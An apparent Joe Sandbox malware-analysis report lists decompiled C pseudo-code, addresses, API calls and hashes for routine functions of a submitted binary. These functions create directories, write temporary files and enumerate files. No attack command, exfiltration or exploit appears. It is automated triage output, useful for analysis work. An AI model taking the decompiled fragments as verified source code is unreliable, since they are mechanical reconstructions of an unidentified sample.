                                • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapInitialize
                              • String ID:
                              • API String ID: 641406236-0
                              • Opcode ID: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                              • Instruction ID: 47133188c5d3e4a4a91398ef735a592283a7fe3b34e77d79aa204ad2d485eaa9
                              • Opcode Fuzzy Hash: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                              • Instruction Fuzzy Hash: 8321C572901609EADB20ABA6DC46BDE7B78EF48764F14021BF511B61C0D77C89C18AAD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040A011 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                              Download Yara Rule
                              C-Code - Quality: 87%
                              			E0040A011(signed int __ecx, void* __eflags) {
				void* _t28;
				intOrPtr* _t42;
				intOrPtr* _t43;
				void* _t49;

				E00413954(E00419E67, _t49);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t49 - 0x10)) = __ecx;
				 *(_t49 - 4) = 4;
				E004042AD(__ecx + 0xb4);
				 *(_t49 - 4) = 3;
				E004042AD(__ecx + 0xa0);
				_t42 = __ecx + 0x8c;
				 *((intOrPtr*)(_t49 - 0x14)) = _t42;
				 *_t42 = 0x41b6c0;
				 *(_t49 - 4) = 5;
				E004042D6();
				 *(_t49 - 4) = 2;
				E004042AD(_t42);
				_t43 = __ecx + 0x78;
				 *((intOrPtr*)(_t49 - 0x14)) = _t43;
				 *_t43 = 0x41b6c8;
				 *(_t49 - 4) = 6;
				E004042D6();
				 *(_t49 - 4) = 1;
				E004042AD(_t43);
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				E00407868(__ecx);
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				asm("sbb ecx, ecx");
				_t28 = E00409C49( ~__ecx & __ecx + 0x00000014,  ~__ecx & __ecx + 0x00000014); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t28;
			}







                              0x0040a016
                              0x0040a01b
                              0x0040a01c
                              0x0040a021
                              0x0040a02a
                              0x0040a031
                              0x0040a03c
                              0x0040a040
                              0x0040a045
                              0x0040a04b
                              0x0040a04e
                              0x0040a056
                              0x0040a05a
                              0x0040a061
                              0x0040a065
                              0x0040a06a
                              0x0040a06d
                              0x0040a070
                              0x0040a078
                              0x0040a07c
                              0x0040a083
                              0x0040a087
                              0x0040a08c
                              0x0040a092
                              0x0040a097
                              0x0040a0a2
                              0x0040a0a6
                              0x0040a0b0
                              0x0040a0b8

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040A016
                                • Part of subcall function 00409C49: __EH_prolog.LIBCMT ref: 00409C4E
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                              • Instruction ID: 1dffea12e82b47f2a36155f0264cd4dada82ecc0bfe076f3ab6191fd12039e28
                              • Opcode Fuzzy Hash: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                              • Instruction Fuzzy Hash: 4C118FB0A01254DADB09EBAAC5153EDFBA69FA1318F14419FA542732D2CBF81B048666
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004092E9 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                              Download Yara Rule
                              C-Code - Quality: 81%
                              			E004092E9(void* __ecx, void* __eflags) {
				signed char _t22;
				void* _t24;
				void* _t45;
				void* _t47;

				E00413954(E00419BF8, _t47);
				_t45 = __ecx;
				_t41 = __ecx + 0x10;
				E00401D7A(__ecx + 0x10,  *((intOrPtr*)(_t47 + 8)));
				_push( *((intOrPtr*)(_t47 + 0xc)));
				_push( *((intOrPtr*)(E00402634(_t47 - 0x18, _t41))));
				 *(_t47 - 4) = 0;
				_t22 = E00405841(__ecx + 0x20, _t41); // executed
				asm("sbb bl, bl");
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				E00403A9C( *((intOrPtr*)(_t47 - 0x18)));
				if( ~_t22 + 1 != 0) {
					 *((intOrPtr*)(_t47 + 8)) = 1;
					E00413D3D(_t47 + 8, 0x41c4c0);
				}
				_t24 = E004042D6();
				 *(_t45 + 0x58) =  *(_t45 + 0x58) & 0x00000000;
				 *((intOrPtr*)(_t45 + 0x88)) = 0;
				 *((intOrPtr*)(_t45 + 0x8c)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t24;
			}







                              0x004092ee
                              0x004092f8
                              0x004092fe
                              0x00409303
                              0x00409308
                              0x00409315
                              0x0040931c
                              0x0040931f
                              0x0040932b
                              0x0040932d
                              0x00409333
                              0x0040933b
                              0x00409346
                              0x0040934d
                              0x0040934d
                              0x00409355
                              0x0040935a
                              0x00409361
                              0x00409367
                              0x00409370
                              0x00409378

                              APIs
                              • __EH_prolog.LIBCMT ref: 004092EE
                                • Part of subcall function 00402634: __EH_prolog.LIBCMT ref: 00402639
                                • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                • Part of subcall function 00413D3D: RaiseException.KERNEL32(00000003,00000000,00000003,?,00000003,?,00000003,00000000,00000000,00401055,00000003,?,00000000), ref: 00413D6B
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$ExceptionRaise
                              • String ID:
                              • API String ID: 2062786585-0
                              • Opcode ID: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                              • Instruction ID: f7fbb3e9a8787d76bf0f9f15101cef5fd9d7ebfa1ebb25f778e30044bb5e9d70
                              • Opcode Fuzzy Hash: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                              • Instruction Fuzzy Hash: 7B01D6766406049ACB10EF25C451ADEBBB1FF95318F00852FE896632E1CB785649CF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00404D6C Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                              Download Yara Rule
                              C-Code - Quality: 64%
                              			E00404D6C(void* __ecx) {
				signed char _t18;
				intOrPtr* _t24;
				void* _t25;
				void* _t27;
				void* _t30;
				void* _t41;

				E00413954(E004195F0, _t41);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				_t18 =  *(__ecx + 0x20) >> 4;
				_t46 = _t18 & 0x00000001;
				if((_t18 & 0x00000001) == 0) {
					_t30 = __ecx + 0x28;
					__eflags = _t30;
					_push(_t30);
					_t27 = E00404BDC( *((intOrPtr*)(E00405417(_t41 - 0x18, _t41 + 8))), __eflags);
					_push( *((intOrPtr*)(_t41 - 0x18)));
				} else {
					_push(__ecx + 0x28);
					_t24 = E00405417(_t41 - 0x18, _t41 + 8);
					 *(_t41 - 4) = 1;
					_t25 = E00404C4A(_t24, _t46); // executed
					_t27 = _t25;
					_push( *((intOrPtr*)(_t41 - 0x18)));
				}
				E00403A9C();
				E00403A9C( *((intOrPtr*)(_t41 + 8)));
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t27;
			}









                              0x00404d71
                              0x00404d7d
                              0x00404d81
                              0x00404d84
                              0x00404d86
                              0x00404da9
                              0x00404da9
                              0x00404daf
                              0x00404dbf
                              0x00404dc1
                              0x00404d88
                              0x00404d8e
                              0x00404d92
                              0x00404d99
                              0x00404d9d
                              0x00404da2
                              0x00404da4
                              0x00404da4
                              0x00404dc4
                              0x00404dcc
                              0x00404dd9
                              0x00404de1

                              APIs
                              • __EH_prolog.LIBCMT ref: 00404D71
                                • Part of subcall function 00405417: __EH_prolog.LIBCMT ref: 0040541C
                                • Part of subcall function 00404C4A: __EH_prolog.LIBCMT ref: 00404C4F
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 0829d6d4e2349ba8d3de6fc09fd6bc5a7f7a281632d8264b3d1e6490f9b222f7
                              • Instruction ID: f66e6ca9409e8e8da17af4a7d05db337a423f76100d3163e29410ef6f876c1fe
                              • Opcode Fuzzy Hash: 0829d6d4e2349ba8d3de6fc09fd6bc5a7f7a281632d8264b3d1e6490f9b222f7
                              • Instruction Fuzzy Hash: 4901A2B25101049ACB09EF90C852BED7B70EF94308F00412FE505776D2DB395A99CA48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004027A6 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004027A6(void* __ecx) {
				void* _t17;
				signed int _t31;
				intOrPtr _t34;
				void* _t36;

				E00413954(E0041919C, _t36);
				E00401CE1(_t36 - 0x18, __ecx + 0x10);
				_t34 =  *((intOrPtr*)(_t36 + 8));
				_t31 = 0;
				 *((intOrPtr*)(_t36 - 4)) = 0;
				if( *((intOrPtr*)(_t34 + 8)) > 0) {
					do {
						E00401DE3(_t36 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0xc)) + _t31 * 4)));
						E0040499C( *((intOrPtr*)(_t36 - 0x18))); // executed
						E00401DB8(_t36 - 0x18, 0x5c);
						_t31 = _t31 + 1;
					} while (_t31 <  *((intOrPtr*)(_t34 + 8)));
				}
				_t17 = E00403A9C( *((intOrPtr*)(_t36 - 0x18)));
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t17;
			}







                              0x004027ab
                              0x004027bc
                              0x004027c1
                              0x004027c4
                              0x004027c6
                              0x004027cc
                              0x004027ce
                              0x004027d7
                              0x004027df
                              0x004027e9
                              0x004027ee
                              0x004027ef
                              0x004027ce
                              0x004027f7
                              0x00402802
                              0x0040280a

                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
                              • Instruction ID: 116dfd3529ede02fc162d870fedee277598c738aed7d6567ac0ffa60a71ea666
                              • Opcode Fuzzy Hash: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
                              • Instruction Fuzzy Hash: BCF04F719005069BDB15EB9AC892AEFBBB5FF80308F00403FE142775E2CA787985DB84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004048B7 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004048B7(WCHAR* __ecx, long __edx) {
				char _v16;
				void* __ebp;
				signed int _t5;
				void* _t9;

				if( *0x423148 != 0) {
					_t5 = SetFileAttributesW(__ecx, __edx); // executed
					return _t5 & 0xffffff00 | _t5 != 0x00000000;
				}
				_t9 = E0040489C( *((intOrPtr*)(E004048FF( &_v16, __ecx))), __edx);
				E00403A9C(_v16);
				return _t9;
			}







                              0x004048c7
                              0x004048f1
                              0x00000000
                              0x004048f9
                              0x004048da
                              0x004048e4
                              0x00000000

                              APIs
                              • SetFileAttributesW.KERNELBASE ref: 004048F1
                                • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
                                • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
                                • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: File$Attributes$ApisH_prolog
                              • String ID:
                              • API String ID: 3885834519-0
                              • Opcode ID: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                              • Instruction ID: d8abee0b5bf8aaacd3c7805e8248c04f8c14d25ec22198af343fb12e16f398c4
                              • Opcode Fuzzy Hash: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                              • Instruction Fuzzy Hash: 76E02B66F002502BC7103BA5AC065DB3B9D9B81314B20C43BA602A3291E9388E44A258
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040499C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040499C(WCHAR* __ecx) {
				char _v16;
				void* __ebp;
				signed int _t5;
				void* _t8;

				if( *0x423148 != 0) {
					_t5 = CreateDirectoryW(__ecx, 0); // executed
					return _t5 & 0xffffff00 | _t5 != 0x00000000;
				} else {
					_t8 = E0040498D( *((intOrPtr*)(E004048FF( &_v16, __ecx))));
					E00403A9C(_v16);
					return _t8;
				}
			}







                              0x004049a9
                              0x004049d0
                              0x004049dc
                              0x004049ab
                              0x004049b8
                              0x004049c2
                              0x004049cc
                              0x004049cc

                              APIs
                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000), ref: 004049D0
                                • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
                                • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
                                • Part of subcall function 0040498D: CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CreateDirectory$ApisFileH_prolog
                              • String ID:
                              • API String ID: 1021588753-0
                              • Opcode ID: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                              • Instruction ID: 2f64d7a75cdf7ff6db5ed191fdbb19fa086d8aebc57dacf92a4c812467fb8a6f
                              • Opcode Fuzzy Hash: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                              • Instruction Fuzzy Hash: 18E0DFA0B002002BCB147B79AC0679E376D4B80218F10867EA652671E1EA7999449608
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004050AB Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004050AB(CHAR* __ecx, CHAR* __edx, CHAR** _a4) {
				int _t4;
				CHAR* _t8;
				CHAR* _t13;
				CHAR** _t15;

				_t15 = _a4;
				_t13 = __edx;
				_t8 = __ecx;
				if(_t15[2] <= 0x105) {
					E0040243E(_t15, 0x105);
				}
				_t4 = GetTempFileNameA(_t8, _t13, 0,  *_t15); // executed
				E00404296(_t15);
				return _t4;
			}







                              0x004050ad
                              0x004050b7
                              0x004050bc
                              0x004050be
                              0x004050c3
                              0x004050c3
                              0x004050ce
                              0x004050d8
                              0x004050e2

                              APIs
                              • GetTempFileNameA.KERNELBASE(?,?,00000000,00000003,?,?,00000000,004050FF,?,?,?,00405160,?,?,?,00000003), ref: 004050CE
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileNameTemp
                              • String ID:
                              • API String ID: 745986568-0
                              • Opcode ID: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
                              • Instruction ID: d5c13e583cf4c34c7a3a11816bb62f42e40da82da4d3cfe63a6d47b8b5213b5b
                              • Opcode Fuzzy Hash: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
                              • Instruction Fuzzy Hash: 91E086723016106BD71056699C45A4BA7DEDFD8752F15843FB545E3381D6B48C004A78
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004058CD Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                              Download Yara Rule
                              C-Code - Quality: 84%
                              			E004058CD(void* __ecx, void* __edx, void* __eflags) {
				void* _t10;
				void* _t25;

				E00413954(E00419718, _t25);
				E00404D51(_t25 - 0x44);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_push(__ecx);
				_t10 = E00405806(_t25 - 0x44, __edx); // executed
				E00403A9C( *((intOrPtr*)(_t25 - 0x1c)));
				 *[fs:0x0] =  *((intOrPtr*)(_t25 - 0xc));
				return _t10;
			}





                              0x004058d2
                              0x004058e1
                              0x004058e6
                              0x004058ea
                              0x004058ee
                              0x004058f8
                              0x00405905
                              0x0040590d

                              APIs
                              • __EH_prolog.LIBCMT ref: 004058D2
                                • Part of subcall function 00405806: __EH_prolog.LIBCMT ref: 0040580B
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
                              • Instruction ID: 5bfd618a99589873673dbdde5608ad138896477ef474a485a6b18cf586c7d2b5
                              • Opcode Fuzzy Hash: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
                              • Instruction Fuzzy Hash: E7E01A72D410049ACB05BB95E9526EDB778EF51319F10403BA412725919B785E18CA58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405C87 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E00405C87(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t12;
				signed int _t14;
				void** _t16;

				_t16 = __ecx;
				_push(__ecx);
				_t12 =  *0x42045c; // 0x400000
				if(_a8 > _t12) {
					_a8 = _t12;
				}
				_v8 = _v8 & 0x00000000;
				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t14 & 0xffffff00 | _t14 != 0x00000000;
			}







                              0x00405c87
                              0x00405c8a
                              0x00405c8b
                              0x00405c93
                              0x00405c95
                              0x00405c95
                              0x00405c9e
                              0x00405caa
                              0x00405cb8
                              0x00405cbe

                              APIs
                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00405CAA
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
                              • Instruction ID: 646c0e8b7f70081892c45aa98fa77e415187d9694f298a279afc83584de54578
                              • Opcode Fuzzy Hash: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
                              • Instruction Fuzzy Hash: F8E0E575600208FFCB11CF95C801B8E7BF9EB09364F20C069F914AA260D339EA50DF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004057CF Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004057CF(void** __ecx, intOrPtr _a4) {
				struct _WIN32_FIND_DATAA _v324;
				int _t7;
				signed int _t10;
				signed int _t11;

				_t7 = FindNextFileA( *__ecx,  &_v324); // executed
				_t11 = _t10 & 0xffffff00 | _t7 != 0x00000000;
				_t16 = _t11;
				if(_t11 != 0) {
					E0040557F( &_v324, _a4, _t16);
				}
				return _t11;
			}







                              0x004057e2
                              0x004057ea
                              0x004057ed
                              0x004057ef
                              0x004057fa
                              0x004057fa
                              0x00405803

                              APIs
                              • FindNextFileA.KERNELBASE(000000FF,?,00000000), ref: 004057E2
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileFindNext
                              • String ID:
                              • API String ID: 2029273394-0
                              • Opcode ID: 3f971b6e9297c3c0785ec7bffefe866e244883e864d52b31c5d14701259a415c
                              • Instruction ID: a758ab2b17ce6f49d488120cb08fd5c978c50398f8c9baf96463bb2a7ddcf629
                              • Opcode Fuzzy Hash: 3f971b6e9297c3c0785ec7bffefe866e244883e864d52b31c5d14701259a415c
                              • Instruction Fuzzy Hash: 7CD0C231140009ABC711EB21DC41EEA33ADEB04348F144075AA495B1B0EA319D489F54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405841 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E00405841(void* __ecx, void* __edx) {
				void* _t11;
				void* _t22;

				E00413954(E004196F0, _t22);
				_push(__ecx);
				 *(_t22 - 0x10) =  *(_t22 - 0x10) | 0xffffffff;
				_t3 = _t22 - 4;
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				_t11 = E004055DE(_t22 - 0x10,  *_t3,  *((intOrPtr*)(_t22 + 8)), __ecx); // executed
				E0040551A(_t22 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
				return _t11;
			}





